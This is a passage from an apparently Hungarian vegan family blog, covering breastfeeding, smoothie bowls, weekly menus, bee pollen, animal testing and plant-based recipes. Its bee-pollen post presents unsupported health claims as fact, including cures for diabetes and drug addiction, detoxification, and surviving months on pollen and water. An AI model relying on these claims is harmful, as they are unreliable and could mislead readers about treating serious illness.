3,6-szer gyakoribb. Az atópiás dermatitis előfordulása a nagy kockázatú családokban 72%-kal gyakoribb a mesterségesen tápláltaknál. Az elhízás kockázata minden szoptatott hónappal 4%-kal csökken. A 2-es típusú diabétesz a későbbi életkorban a tápszerrel tápláltaknál 64%-kal gyakoribb. A krónikus emésztőrendszeri betegség előfordulásának kockázatát a mesterséges táplálás jelentősen növeli: a későbbi életkorban a colitis ulcerosa előfordulási esélye 78%-kal, a Crohn betegségé 2,2-szeresére nő a kizárólagosan szoptatottakhoz képest. Meddig szoptassunk? A WHO és az Amerikai gyermekgyógyász Akadémia javasolja a 2 éves korig, és az azon túl is folytatott szoptatást, amennyiben azt az anya és a gyermek is kívánják. Hazánkban az újszülöttek 57,7%-a 119 napos (3 hónapos) koráig kizárólag szoptatott volt, 179 napos (6 hónapos) korban a csecsemők 37,6 %-a volt kizárólag szoptatott. A 12 hónapos kor után is anyatejet kapott csecsemők aránya 36,9% (2009. év OSZMK adat). Nagyon nagy ellenérzés van a társadalom felől (sőt a dokinéni, a családtagok körében is), ha 1,5-2 éves kor fölött még cicizik a gyermekünk. Itt megint kitérek az írásom elején mondottakra. Kit érdekel? Ha én szoptatni akarok, és a babám szopni akar, akkor fog is! Lehet diszkréten, persze az kiveri nálam a biztosítékot, ha a WC-be akarnak küldeni szoptatni. Miért? Te ennél WC-ben? Én 2 éves korukig szoptattam mindhárom lányomat, akkor már nekem volt egy kicsit nehézkes, én döntöttemúgy, hogy ennyi elég volt. Nem érdekelt, hogy ki mit gondol. Megküzdöttem azért, hogy szoptatni tudjak, akkor nem fogom csak azért abbahagyni, mert a környezetemnek nem tetszik. Félreértés ne essék, nem ítélem el azokat, akik nem tudják vagy nem akarják szoptatni gyermeküket. Nem ettől lesz valaki jobb vagy rosszabb anya. Mindenki kerülhet olyan élethelyzetbe, pl. betegség, családi válság, amikor a szoptatás kevésbé fontos, és a tápszer kerül előtérbe. Biztos vagyok benne, hogy ezek a babák is felnőhetnek ugyanolyan boldogságban és szeretetben. Felhasznált irodalom: http://www.mave.hu/uploads/file/VSZK%20protokoll%20csecsemo%20taplalasa%200-12%20ho.pdf www.szoptatasportal.hu
Smoothie bowl, avagy az ehető szuper turmix
2015. április 1. Zizi kalandjai
A The Telegraph egyik februári cikke szerint a legújabb kaja trend a smoothie bowl, azaz magyarul valami ilyesmit jelent: turmix tálban felszolgálva, de állagából adódóan gyümölcsös joghurt krémfagylalt is lehet. Tehát ez egy olyan smoothie/turmix, amit inkább eszünk, mint iszunk, mivel az állaga egy kicsit sűrűbbre van hagyva. Trend vagy nem trend, mi imádjuk! A fotón lévő kisebb tálkából Ádi evett, általában kétszer-háromszor repetázik, szóval akkora adagot eszik a végén, mint én! Nagy népszerűségének köszönhetően hetente többször ezt reggelizzük mostanában.
És, hogy miből áll össze a smoothie bowl?
Van benne:
– gyümölcs (banán édesítés és krémesség miatt, avokádó, bogyós gyümölcsök vagy citrusfélék)
– leveles zöld (spenót, mángold, leveleskel, stb.)
– szuperélelmiszer (kendermagliszt, chia mag, stb.)
– fehérje + zsiradék (mandulavaj, földimogyoróvaj, stb.)
– folyadék (többnyire növényi tej vagy kókuszvíz)
A banánt és az avokádót frissen teszem bele, azonban a bogyós gyümölcsöket fagyasztott állapotban, így ez kellemesen hűssé teszi és tényleg krémes fagylalt jelleget ad neki. Nyáron kiváló reggeli lesz a nagy melegben. Leveles zöldek közül olyat válasszunk, aminek semleges íze van. A szuperélelmiszerek tárháza kifogyhatatlan, szinte az egész smoothie bowl szuperélelmiszerek hada, de ha még pluszban akarunk hozzáadni valamit, akkor kísérletezhetünk kendermagliszttel, chlorrelával, spirulinával, búzafű porral, stb.
Én most kivételesen nagyon extrát tettem bele, baobabot, amit ajándékba kaptam Angliából (már itthon is kapható egyébként). A baobab – másnéven majomkenyérfa – az afrikai tájképek jellegzetes fája. A gyökerétől a terméséig minden részét táplálékként használják fel. A gyümölcshúsnak igen magas a C- és B vitamin, valamint kálcium tartalma. A benne lévő rostok hatékonyan hatnak az emésztésre. Afrikában az egyik legjelentősebb haszonnövény. Nagyon érdekes a baobab legendája… “A teremtés hajnalán az első fa a baobabfa volt. Őt követte a sudár és kecses pálmafa. Amikor a baobabfa meglátta a pálmafát, rögtön sírni kezdett: hadd lehessen magasabb… Eztán feltűnt a tűzvörös juhar lángoló virágaival, és a baobabfa rögtön irigy lett a csodás virágokra. Végül a baobabfa megpillantotta a fönséges fügefát, és gyümölcsökért fohászkodott. Erre az istenek nagyon dühösek lettek, megfogták a baobabfát, kitépték a földből, és fejre állítva újra elültették, hogy végre elhallgasson.” (Forrás: AntalVali.com)
Gazdagabbá tehetjük reggelinket, ha adunk hozzá mandulavajat, földimogyoróvajat vagy kesudióvajat. Növényi tejek közül pedig bármelyik megfelel, legyen az kókusztej, zab-, rizs-, mandula- vagy diótej. Mivel sűrű joghurt állaga lesz, a tetejére mindenképpen ajánlok valami ropogtatnivalót!
Tudom, ez egy költségesebb reggeli, ha az alapanyagokat nézzük, de azért lehet a költségeken faragni: banánt, avokádót lehet nagyon sokszor akciósan kapni egyes élelmiszer üzletekben (én ma pl. kiváló Hass avokádókat vettem a Lidlben 175 Ft/db áron). A fagyasztott bogyós gyümölcsök szerintem olcsóbbak, mint a frissek. A leveles zöldek szezonális áron kaphatók lassan a piacokon. Az extra szuperélelmiszer porokat el is hagyhatjuk, ez csak extra, enélkül is kiváló lesz a krémes joghurtunk. Viszont rakhatunk bele lenmagot vagy chia magot. A magvajakat és a növényi tejeket pedig mi magunk is elkészíthetjük házilag.
A hozzávalók tárháza kifogyhatatlan, a fantáziátokra bízom, hogy milyen smoothie bowl-t csináltok magatoknak. Küldjetek róla egy képet, ha kipróbáltátok és ízlett!
Málnás smoothie bowl
Hozzávalók 3 főre:
– 1 db banán, meghámozva, felszeletelve
– 1/2 avokádó, kanállal kikapart húsa
– egy kisebb marék leveleskel
– két közepes maréknyi fagyasztott málna
– 2 evőkanál zabpehely
– 1 evőkanál mandulavaj
– 1 evőkanál lenmag
– 1/2 evőkanál chia mag
– 3 teáskanál baobab por
– 1/2 teáskanál fahéj
– kb. 300 ml mandulatej vagy egy kicsivel több, attól függően, hogy milyen állagúra szeretnénk
– tetejére: hántolt kendermag, pirított natúr napraforgómag vagy tökmag, goji bogyó
Tegyünk minden hozzávalót a turmixgépbe és pépesítsük simára néhány perc alatt. Ha túl sűrűnek találjuk, adjunk még hozzá egy kis mandulatejet. Adagoljuk tálkákba és tálaljuk pirított napraforgómaggal, goji bogyóval megszórva.
Menü- 2. hét
2015. március 29. Mindennapi ételeink
Remélem, mindenkinek jól telt az elmúlt hete. Hozom a 2. heti menüt. Mi egy három napos utazáson vagyunk túl, amelyben régi otthonunkba is ellátogattunk Vácon, ill. a veresegyházi medvéket is meglestük. Már nem alusznak téli álmot :-) Itt a tavasz szerintük is :-) Szép új hetet! HÉTFŐ R: Rizstej, müzli, alma, narancs V: Krumplipüré, sóska, sült tofuszelet E: Ebéd maradék / "vegazsír", kenyér, paradicsom KEDD R: Turmix, majd kicsit később: házi édes zsemle, sós mogyorókrém, baracklekvár, banán E: Vadas, tészta, karobos csiga, alma V: Jégsaláta, élesztőpástétomos melegszendvics, répalé SZERDA R: Diótejes zabkása, reszelt almával, házi nutellával E: Paradicsomleves, mexikói zöldségekkel töltött palacsinta, tepsiben összesütve , saláta V: Ebédről maradék CSÜTÖRTÖK R: Frissen préselt alma-narancslé, köleskása aszalt gyümölcsökkel E: Sárgaborsóleves, rizs, rántott cukkini, paradicsomsaláta V: Házi kifli, zöldségpástétom (főtt krumpli, répa, karalábé + olaj, párolt hagyma+ fűszerek, sörélesztőpehely) PÉNTEK R: Gabonakávé, tejbegríz, narancs E: Krumplifőzelék,búzahús pörkölt, diós piskóta (vegán) V: "Garlic" melegszendvics, saláta (Fanninak ebédmaradék) SZOMBAT R: Granola müzli, növényi tej, banán E: Búzahús-paprikás, tarhonya, uborkasaláta V: Ebédmaradék VASÁRNAP R: Házilag sütött kuglóf, mogyorókrém, mandarin E: Zellerkrémleves zsemlegombóccal, rakott savanyú káposzta (bulgur, savanyú káposzta, gabonakolbász.pörkölt, növényi tejföl) V: Ebédmaradék
Virágporos gyümölcsturmix
Kiskoromban szénanáthától szenvedtem, majdnem egész nyáron. Valakinek a javaslatára anyu virágport szerzett be, azért, hogy ezzel "kezeljük" az allergiámat. Azóta eltelt két évtized is legalább, s virágporral nem igen foglalkoztam, egészen addig, míg férjemmel vásárolni voltunk az egyik nagy - egészséges dolgokat árusító - áruházban, ahol észrevette az egyik polcon a csomagolt virágport és rákérdezett nálam. Erre én felidéztem, hogy anno a szénanáthámat próbáltuk úgymond gyógyítani vele. Kosarunkban landolt egy kisebb zacskónyi, majd otthon már utánanéztem, mit is kell tudni róla, sőt Tóth Gábort is sikerült megkérdeznem a virágporról. Mindezek után bizton állíthatom, hogy az allergia-szezon beállta előtt a szénanáthásoknak napi rendszerességgel érdemes fogyasztani 1 kiskanálnyi virágport (ha lehet, hárs virágport). Akár gyümölcsturmixba, zöld turmixba keverve, vagy némi vízzel, langyos teával fogyasztani. A virágport kúraszerűen kell alkalmazni, tehát nem egész évben napi rendszerességgel. Én "superfood"-ként tekintek rá, mert számtalan betegség esetén érdemes alkalmazni. Néhány példa a teljesség igénye nélkül:
Közismerten enyhíti a cukorbetegség tüneteit. Az orvosok jó eredményeket értek el. Egy kísérlet során 2 héten keresztül napi 32 gramm nyers virágpor csökkentette a cukor mennyiségét a vizeletben, 1 literben 41,8 grammra redukálta.
Köztudottan szabályozza a bélfunkciókat, különösen az antibiotikus kezeléseknek is ellenálló, krónikus székrekedés vagy hasmenés esetén. Az emésztőrendszerbe jutva a virágpor gyorsan ég, ezáltal a zsírok gyorsabb égését is elősegíti és növeli az elégetett kalóriák arányát. A virágpor segíti más táplálékok megemésztését is, és segíti a súlykontroll során. (Megjegyzem, az első két-három alkalommal hasmenést okozott nekem, de ezt követően hozzászokott a szervezetem, ma már semmi problémám nincs a fogyasztása miatt. Amennyiben hasmenést okoz, az adagot egy picit érdemes csökkenteni.)
A virágpor rendkívüli módon energetizálja a szervezetet. Sokan tápanyag hiány, mások a kiegyensúlyozatlan tápanyag arány miatt fáradékonyak. Mindkettő esetén segít a nyers virágpor, hiszen több mint 100 összetevő van benne, ráadásul ezek természetes formában - így könnyen felszívódnak - és olyan arányban, ahogy a testünknek leginkább szüksége van rájuk. Tavaszi fáradtságunkat is segít száműzni egy virágpor-kúra.
A virágpor immunerősítő, megvan az a képessége, hogy helyreállítsa a szervezet kémiai folyamatait és megszüntesse az egészségtelen tényezőket. Európai orvosok felismerték, hogy az alkoholproblémákkal küzdő embereket pollennel kezelve rendkívüli mértékben csökkent az alkohol utáni vágy. Azoknál a fiataloknál, akik szerettek volna megszabadulni a nehézdrogok okozta függőségtől, a virágpor hatására a droghasználat a minimálisra csökkent vagy teljesen megszűnt. A virágpor képes a mérgeket és toxikus anyagokat eltávolítani a testből. Dohányzóknak külön ajánlatos fogyasztani, hiszen szabadulni nehéz a káros szokástól.
A virágpor rengeteg olyan tápanyagot tartalmaz, amelyre hajunknak szüksége van. Alkalmazhatjuk a nyers virágport hajpakolásokban is, egyből a hajhagymákat erősítve.
A virágpor a mellékvese kéregben segíti a hormonelválasztást, szabályozza a só- és vízanyagcserét, a neuromuszkuláris funkciókat, a szénhidrát-, zsír- és fehérje anyagcserét, növeli az ellenállást a fizikai és vegyi hatásokkal, valamint a fertőzésekkel szemben, segíti a haj növekedését, javítja a bőr állapotát és a szexuális funkciókat (beleértve a másodlagos nemi jellegek fejlődését is).
A nyers virágpor hatékonyan erősíti az immunrendszert. Immunerősítő hatását rendkívüli összetettségének köszönheti. Egyes kutatók állítják, hogy csak nyers virágpor és víz fogyasztásával az ember hónapokig képes jó egészségben elélni. A virágpor több szinten támogatja az immunrendszert. Először is jótékonyan hat a bélflórára és a májra, tisztítja őket. A tisztítás eredménye az lesz, hogy a más élelmiszerekben lévő tápanyagok nagyobb mennyiségben fognak hasznosulni ezt követően a szervezetben. A virágpor tele van antibakteriális, baktérium ellenes anyagokkal. Így a virágpor fokozza a kórokozókkal szembeni nagyobb ellenállásunkat. Mivel a virágpor képes szervezetünket teljes körűen ellátni a szükséges tápanyagokkal, a tökéletes választás azoknak, akik hiányosan táplálkoznak, azaz nem viszik be nap mint nap a szervezetük számára szükséges vitaminokat, ásványi anyagokat és nyomelemeket.
A krónikus fáradtság köztudottan tápanyaghiányos állapotok miatt alakul ki, az esetek 90%-ában. Ez gyakorlatilag azt jelenti, hogy kevés van bizonyos vitaminokból, ásványi anyagokból vagy éppen nyomelemekből a szervezetünkben. Mivel a nyers virágpor több mint 100 összetevőből áll, képes pótólni a hiányzó tápanyagokat. Ráadásul a virágporban természetes formában vannak jelen és olyan arányban, amelyben a testünk számára is ideálisak.
A virágpor csökkenti a túlsúlyt és enyhíti az elhízást, azonban kóros soványság esetén növeli a testsúlyt.
Franciaországban és Lengyelországban néhány orvos gyermekek és felnőttek étrendjébe beillesztette a virágport és azt tapasztalták, hogy pár nap múlva mindegyikük jobban érezte magát és a vérvizsgálatok is javulást mutattak, különösen a vérszegény gyermekek esetében.
(forrás és további infó: http://www.nyersviragpor.hu/hatasai/)
A recept:
Hozzávalók:
- 1 banán
- 2-3 alma
- 1 kiskanálnyi virágpor
- 1-2 dl kéz-meleg víz
- turmixgép
Elkészítés:
Az almát alaposan megmossuk, majd a turmixgépbe daraboljuk. A banánt héjától megfosztjuk, beledaraboljuk a gép poharába, majd hozzászórjuk a virágport. Kevés vizet öntünk a turmixgépbe és már mehet is a turmixolás egészen addig, míg jó sűrű pépet nem kapunk. Poharakba vagy bögrékbe töltjük és elfogyasztjuk.
A virágport érdemes fokozatosan bevezetni reggelijeinkbe. Először kisebb adaggal kezdeni (pl. fél kiskanálnyi), majd mindig egy kicsit többet, hogy ne okozzon emésztési problémát. Kúraszerű alkalmazása javasolt.
Húsvétra hangolódva- kicsit másképp
Ha Húsvét, akkor nyuszi. Azt hiszem szinte nincs is olyan ember, aki nem mosolyodik el, ha egy cuki nyuszit lát, amint aranyosan ugrálva a fűben szimatol. De vajon a többi nyuszi is eszünkbe jut? Mert vannak sajnos olyanok is, akiket nem a képeslapokra fotóznak, hanem ketrecekbe zárva rettegve várják a holnapot. Ha még nem jöttél rá magadtól, akkor igen, ezúttal az állatkísérletekről szeretnék írni. Sajnos az állatkísérletek nap mint nap sok szenvedést és ártatlan életeket követelnek. De nem csak a nyuszik szenvednek. Állatkísérleteket végeznek kutyákon, macskákon, majmokon, patkányokon, egereken, tengeri malacokon, nyulakon és még sorolhatnám. Állatokat kínzunk a tudomány, a gyógyítás, és a szépség nevében. A kozmetikai iparban leginkább a nyulak, egerek, patkányok és tengeri malacok a legkedveltebbek. Gondoljunk csak bele, elég ha egy kis sampon belemegy a szemünkbe, máris hogy tud csípni! Megpróbáljuk azonnal kimosni. Ezek az állatok vajon mit élhetnek át? Rossz bele is gondolni... És ne gondoljuk azt, hogy ez az egyetlen módja annak, hogy kiderüljön hogy egy anyag allergiát vált ki avagy sem. Számos alternatív módszer is létezik. Ezért kérlek gondold át újra, mielőtt legközelebb választasz a boltok polcain lévő tucatnyi termék közül! Kategóriák: NOT TESTED ON ANIMALS/AGAINST OF ANIMAL TESTING A kész terméket már nem tesztelték állatokon. Ami egyáltalán nem jelenti azt, hogy a termék előallítása során nem teszteltek. CRUELTY FREE (CF) Azaz kegyetlenség mentes. Ilyenkor sem a terméket, sem az összetevőket, sem a nyersanyagokat, sem a cég, sem harmadik fél által. VEGAN Ilyenkor szintén nem tesztelnek állatokon. Sem a terméket, sem az összetevőket, sem a cég, sem pedig harmadik fél által. Ezen felül nem tartalmazhatnak állati eredetű anyagokat. A világot megváltani nem tudjuk. De úgy gondolom, hogy a magunk szintjén kell mindent megtennünk, hogy jobb legyen a világ. Mondjunk nemet az állatkísérletekre! Ennek a legegyszerűbb módja, ha az említett logóval ellátott termékeket vásároljuk. És egy kis fejfájás vagy megfázás miatt nem egyből a gyógyszeres doboz után nyúlunk, hanem előbb megpróbálunk a természet patikájából gyógyírt találni. Ha ezt megtesszük, akkor máris sokat tettünk az állatokért. Forrás: http://www.szepsegreceptek.hu/kozmetikumok/allatkiserletek/cruelty-free-es-allatokon-tesztelo-cegek-listaja/ https://www.facebook.com/allatkiserlet.mentes Lista: https://drive.google.com/file/d/0B_GrhDWaiOilWXp6dVlGdzFlNzA/edit
Lilakáposzta főzelék
2015. március 24. Mindennapi ételeink
Érdemes lila színű zöldségeket, gyümölcsöket többet fogyasztanunk. Ennek jegyében ettünk valamelyik nap lilakáposztából készült főzeléket. A lilakáposzta egyébként 36 féle rákellenes anyagot tartalmaz. Hozzávalók: 1 kisebb fej lilakáposzta 1 fej lilahagyma 3 ek. olaj 3 ek. finomliszt himalaya só - ízlés szerint római kömény, vagy sima köménymag - ízlés szerint 8-10 ek. zabitalpor / natúr növényi tej víz - kb. 1-1,5 l citromlé . ízlés szerint Elkészítés: A hagymát apró kockákra vágjuk. Olaj és víz keverékén megpároljuk. Eközben a lilakáposztát nagy lyukú reszelőn lereszeljük, majd a megpárolódott hagymához tesszük, ízesítjük köménymaggal, sóval. Felöntjük növényi tejjel (annyival, amennyi ellepi) és megpároljuk. Közben elkészítjük a rántást: szárazon megpirítjuk a lisztet, majd hozzáadunk a káposzta levéből, Az így elkészült rántást ha szükséges, botmixerrel csomómentesre mixeljük, és egy szűrő segítségével a főzelékhez adjuk. Végül citromlével ízesítjük. TIPP: tálaljuk sütőben sült burgonya / édesburgonya / sütőtök tócsnival vagy krokettel..de önmagában is finom lesz . :-)
Eszter szelet
2015. március 21. Éltető ételek
Nincs annál nagyobb öröm, amikor a lányok örömmel falatozzák be az általam készített ételeket. Nos, ezt az édességet a nagylányom után neveztem el, ugyanis azt mondta, hogy ezt feltétlenül mentsem el, hogy bármikor ugyanígy, ugyanezt el tudjam készíteni. Ugyanis az jellemző rám, hogy sokszor csak improvizálok, majd másnap már nem is emlékszem a receptre. Úgyhogy ezt sebtiben le is írom, hogy nehogy feledésbe merüljön. Hozzávalók: - 10 dkg mogyoró - 20 dkg datolya - 10 dkg dió - 5 dkg kókuszreszelék - 1 kávéskanál vaníliapor - 1 evőkanál kakaópor - 4 dkg kakaóvaj - + 10 dkg darabosra tört dió - csipet himalája só Elkészítése: - A mogyorót daráljuk meg kávédarálón annyira, hogy jó krémes legyen. - Vegyük elő a a konyhai robotgépet, majd tegyük bele a datolyát, a mogyorókrémet és a diót. - Daráljuk morzsásra. - Adjuk hozzá a kókuszreszeléket, a vaníliaport, a kakaóport és a csipet sót. - Jól keverjük össze. - A darabosra tört diót is dolgozzuk bele. - A végén hozzákeverjük a vízgőz felett felolvasztott kakaóvajat. - Egy 20x20 cm-es formába jól nyomkodjuk bele, és tegyük be a hűtőbe 1-2 órára. - Szeleteljük fel.
Tápláló brokkolikrémleves mozzarellával és tökmaggal (zöld menüsor Szent Patrik napon 1.rész)
2015. március 20. Zöld Avocado
Az előző bejegyzés az írországi Szent Patrik napról, és az általa okozott "bezöldülésről" szólt! Prezentáltam nektek egy zöld menüsort, és azt ígértem, hogy végig veszem a recepteket. Tudom, hogy mindenki a látványos szőlős- csoki krémes torta receptre vár, ezért nem azzal kezdem! :-) A jó dolgokat általában ki kell érdemelni, a finom falatokra mindig várni kell, és az étkezést sem a desszertel kezdjük... legalább is általában nem. ;-) Egy kis türelmeteket kérem, és azt, hogy adjatok esélyt a többi zöld ételnek is, ne csak az édességnek! :-) tápláló brokkolikrémleves mozzarellával Kezdjük a menüt a zöld levessel, ami ezúttal egy krémes, tápanyagban gazdag, ízletes és egyszerűen elkészíthető brokkolikrémleves. Tudom, tudom... a brokkoli nem egy közkedvelt zöldség. Higyjétek el, nálam sem volt az korábban. ;-) De az a jó a kevésbé finom zöldségekben is, hogy el lehet készíteni őket ízletes ételekként, és akkor szívesen kanalazzuk az értékes zöld brokkoli rózsákat például levesként, vagy eldugva egy burgonyás egytálételben. Jóóóó sok évvel ezelőtt vendégségben voltunk valahol, ahol illedelmességből megkóstoltam a számomra akkoriban egyáltalán nem vonzó tejszínes brokkolikrémlevest, szárított kenyér kockákkal, és reszelt sajttal. Mondanom sem kell, magamtól nem készítettem volna brokkolit semmilyen formában ezidőtájt. Illedelmességből megkóstoltam, és azóta nem tudom abbahagyni! :-) Persze a kenyér kockák mára már tökmag vagy napraforgó maggá alakultak, a reszelt sajt sem állandó szereplője ennek a tápláló krémlevesnek, és a tejszínes sűrítést felváltotta a természetes sűrítés*. Na és akkor röviden miért is olyan értékes és tápláló a brokkoli? "Rosttartalma jótékony hatású székrekedéses panaszoknál, mivel serkenti a belek mozgását. Ásványi anyagai közül említésre méltó a kálium, a kalcium, a magnézium, nátrium, a vas, a cink és a foszfor. A nyers növényben B1-, B2-, B6-vitamin, C-vitamin, K-vitamin és E-vitamin is kimutatható, valamint az A-vitamin provitaminja, a béta-karotin. Igen gazdag folsavban; fogyasztása várandósoknak kifejezetten javasolt. A brokkoli az egyik C-vitaminban leggazdagabb zöldség. Többek között megtalálható benne az a szulforafán nevű kéntartalmú vegyületet is, amely kemopreventív molekulaként segíti a szervezetnek a daganatos sejtek elpusztítását célzó természetes folyamatainak a beindulását. Ezen kívül támogatja a szervezet méregtelenítésében fontos védőenzimek működését is, amelyek segítenek a rákkeltő anyagok kiválasztásában és megelőzik a rákhoz vezető sejtkárosodást. Különösen az ösztrogénfüggő emlő- és egyéb daganatok esetében játszhat szerepet a rákmegelőzésben. Régóta fölismerték a kutatók, hogy a nyers vagy párolt brokkolit gyakran evő közösségekben a koszorúér-betegség és bizonyos daganatok ritkábban fordulnak elő. Egy új vizsgálat most azt jelzi, hogy brokkoli fogyasztásával jelentősen fokozható a szív oxigénhiánnyal szembeni ellenálló képessége. " Forrás: Dietetika Életmód brokkolikrémleves mozzarellával HOZZÁVALÓK: (kb. 4 személyre) - 2 nagyobb fej brokkoli (lehetőleg kistermelőtől) - 2 nagy fej vöröshagyma - 4 gerezd fokhagyma - kevés extra szűz olíva olaj, vagy kókusz olaj - 2 db bio leveskocka - egy marék friss petrezselyem - Himalája só, őrölt fekete bors, 1 ek mustár - tökmag és napraforgó mag levesbetétnek - mozzarella sajt ELKÉSZÍTÉS:Egy nagyobb levesfőző edényben kevés olíva / kókusz olajon aranybarnára dinszteljük az előre apróra felvágott vöröshagymákat. Felengedjük kb. 1,5 liter vízzel, beletesszük a bio leveskockákat, a sót, borsot, mustárt, a felkarikázott fokhagymákat, és egy marék friss petrezselymet. Ne spóroljunk a fűszerekkel, mert ez adja a leves ízét. Fedő alatt, közepes lángon elkezdjük összefőzni a leves alapot, közben pedig elkészítjük a brokkolit. A brokkolikat rózsáikra szedjük, és alaposan megmossuk. Mivel a brokkoli nyersen és párolva őrzi meg értékes ásványi anyag- és vitamin tartalmát, ezért ebben a receptben nem főzzük meg őket, hanem csak pároljuk, hogy egy igazán tápláló levest kapjunk végeredményül. :-) Elővesszük a pároló edényt (vagy ha van a kuktánkat), és feltesszük a brokkolikat gőzben párolódni. 10 perc múlva elzárjuk a hőt a tűzhelyen lévő mindkét edényünk alatt. A párolt brokkoli rózsákat beletesszük az alaplébe, és kézi botmixerrel krémes állagúra mixeljük a levest. *Hiányzik valami??? Hiányzik a jól megszokott habarás, a rántás vagy a tejszínes sűrítés? Jól látod, hogy nem látod. :-) A természetes sűrítésnél, nincs szükségünk sem habarásra, sem rántásra, sem tejszínes sűrítésre ahhoz, hogy egy krémes levest vagy akár egy főzeléket kapjunk végeredményül. Sokkal egészségesebb, és emészthetőbb, ha a leveseket, főzelékeket, önmagukkal sűrírtjük be. Ez azt jelenti, hogy egyrészt ne főzzük őket bő lével, másrészt miután megfőtt az adott zöldség, merjünk ki az edényből 1-2 merőkanállal a majdnem kész ételből, a kimert adagot turmixoljuk le, majd keverjük vissza a főzelékbe, miközben a tűzhely bekapcsolva marad. Ha túl híg a főzelék, vegyünk ki belőle nagyobb adagot, és sűrítsük be önmagával. A krémleveseket pedig egyszerűen csak kézi botmixerrel turmixoljuk le miután megfőtt a zöldség, egy kevéssel több vízben, mint ami ellepi. Ennyi. Ilyen egyszerű! :-) Nem kell semmilyen egyéb adalékanyag ahhoz, hogy a híg állagból sűrűt kapjunk. Tökmaggal, és / vagy napraforgó maggal pótolhatjuk a leves tésztát, melyet az apróra morzsolt mozzarrelával együtt, fogyasztás előtt, a meleg levesbe szórva tálalunk. tápláló brokkolikrémleves mozzarellával Tápanyagban gazdag Jó étvágyat kívánunk mindenkinek! ;-) Megjegyzés: Azt tudtátok, hogy "a dél-olaszországból származó mozzarella sajtot, a 16. század óta változatlan recept alapján készítik, a háziasított vízibivaly zsíros tejéből?! Gyártása során nem érlelik, semmilyen tartósítószert nem adnak hozzá, és nem is ízesítik. A készítés során a sajt zsírdús alapanyagát addig nyújtják és gyúrják, amíg végül formázhatóvá válik. A bivalytejben nincs karotin, ezért a színe tiszta fehér." Forrás: wikipedia
Tavasz, zsömle, Godzilla
A kertben mindenütt bújnak a hagymások, január vége óta figyelem őket, ahogy először kibújtak a jácintok hajtásai. Azóta a krókuszok közül már el is virágoztak, némelyik jácint kinyílt, rengeteg ibolya illatozik, a japánbirs virágai csaknem kipattannak. Csendélet, kicsi kéz épp nem töri a rügyeket, simogat, csodál, mosolyog. Másnap mire kimegyek a liliom megtaposva, jácint letörve, és virágonként szétszórva a járdán. A fás bazsarózsát megritkította még hetekkel ezelőtt, azóta nagyjából tiszteletben tartja, de tegnapelőtt csak a tenyerében landolt egy bimbó. [Ki ismeri a Lilo & Stitch Godzilláját? És persze valójában az ezt követő rész lenne lényeges igazán...] Ilyenkor elszomorodik, elcsügged az ember, vagy felmegy az agyvize... Pedig valójában egy kis manó szívének megkeserítése ez ügyben nem áll összhangban semmiféle virág szépségével. Merthogy nem gonoszságból tette, csak az "elméjéhez köttetett a bolondság", nincsenek meg a fejében az ok okozati összefüggések, ő még tapasztal. (És én is, hogy mi minden lakozik bennem.) Persze a tépkedés nem folytatódhat, meg kell tanítani, hogy ez így nem állapot. Az ember, mikor még nincs gyereke, fogalma nincs róla, valójában mit is vállal (akkor sem, ha kisgyermekes közegben sokat mozog) és hogy mekkora a felelőssége ezzel kapcsolatban. Csodálatos elméletei vannak, mégis a gyakorlatban mennyire más. Azután azt veszi észre, hogy hullanak ki az elméletek, olykor marad a kétségbeesés, hogy lesz ebből "rendes ember", ha az én kezeimre van bízva. Hát csak úgy, ha van egy segítőm, aki pontosan tudja a jó irányt, és ráhagyatkozom. Ellenben hullámvölgy az egész, egyszer fenn, egyszer lenn. Mikor épp hallgatok rá, fenn, aztán azt gondolom megy ez nekem egyedül is, óhatatlan következmény a lent. Ennek ellenére pártfogol és megerősít, ha kérem. És egy ilyen kis nyüzsgő, érdeklődő lény örökös tevékenykedéséből adódó helyzetek mindig eszembe juttatják, még ha meg is feledkeznék egyébként a függőségi viszonyról, és letörik a szarvamat, már ha nőni kezdene. :) Ugyanígy kell alakítani a csöppek akaratos jellemét "korlátok felállításával és tetteik következményeinek kiszabásával", ellenben károsíthatjuk a teljes szabadjára engedéssel. Hiszen később az életben, mikor mindenben érvényesíteni akarja majd az akaratát, és nem működik - mert nem is működhet közösségekben - kudarcként él meg mindent, és keseredik el olyan dolgokon, amelyekre csak legyintenie kellene, és elengedni. Persze ez nem erőszakos neveléssel megy, hanem jó példával, sok sok szeretettel, szelídséggel, öleléssel, türelemmel és bölcsességgel. Ami nem tőlünk van, hanem ajándékként kapjuk, és addig betonba ágyazott, míg folyamatos a kapcsolat Vele. (Különben ki adhatna jót önmagából?) De térjünk egy kicsit gastro témára is, mert sültek ám zsömlék is a konyhában, nem csak kertészkedtünk. Magdi adott egy jó ötletet hozzájuk. A hagyományos tésztámat használtam, 60 dkg liszt, 360 ml növényi tej és víz keveréke, 6 ek olivaolaj, 1,5 tk só, 1 kk méz, 1/4 kocka élesztő, magok. A tetejére kentem egy kis szójajoghurtot, amitől tényleg fényes lesz, ahogy Magdi írta és megszórtam szezámmaggal. Máskor csak vízzel megkenem, hogy ráragadjanak a tésztára. Ha már felbontottuk a szójajoghurtot, és el akarjuk használni, a tésztába is lehet tenni, akkor 1 kis dobozos szójajoghurt és kb 250 ml víz váltja ki a növényi tej és víz keverékét. Jó állagú tésztát kapunk, puhábbat a szokásosnál.
Tejszínes tofuragu
A tofu esetében az emberek általában arra gondolnak, hogy szójából van, ezért aztán inkább száműzik, mert sokan ellenségként tekintenek rá (míg a húsfélékre nem, vagy kevesebben). Azt talán sokan nem is figyelik, vagy nem is tudják, hogy mennyire jelen van a hétköznapunkban a szója különböző származéka. Például a szójalecitin nem véletlen kapott E-számot, konkrétan az E322-t, mivel adalékanyagként van jelen számos ételben. Joghurthoz, fagyikhoz, margarinhoz, húspótlókhoz, édességekhez, babatápszerekhez, gabonapelyhekhez, stb. használja az élelmiszeripar. Ami pedig a tofut illeti, a szójatejből készült "sajt-utánzat"-ról már kevesen tudják, hogy foszfort, kalciumot, káliumot, B-vitaminokat tartalmaz. Emellett könnyen emészthető, mintegy 35-38%-a fehérjetartalma van és koleszterinmentes élelem. Persze a társadalom éppúgy megoszlik szója/tofu evő emberekre és azt mellőzőekre, ahogy vannak akik húst nem fogyasztanak szemben azokkal, akik nem tudják hús nélkül elképzelni életüket. Ha viszont gyors ebédet, vacsorát készítenél, és a tofut még nem is próbáltad, mert idegenkedsz tőle, ezzel a tejszínes tofuraguval akár kezdheted is a barátkozást. Ha pedig szereted a tofut és fogyasztod is, szolgáljon jó ötletként az alábbi recept egy könnyen elkészíthető ebédhez vagy vacsorához.
A recept
Hozzávalók:
- 1 csomag füstölt tofu
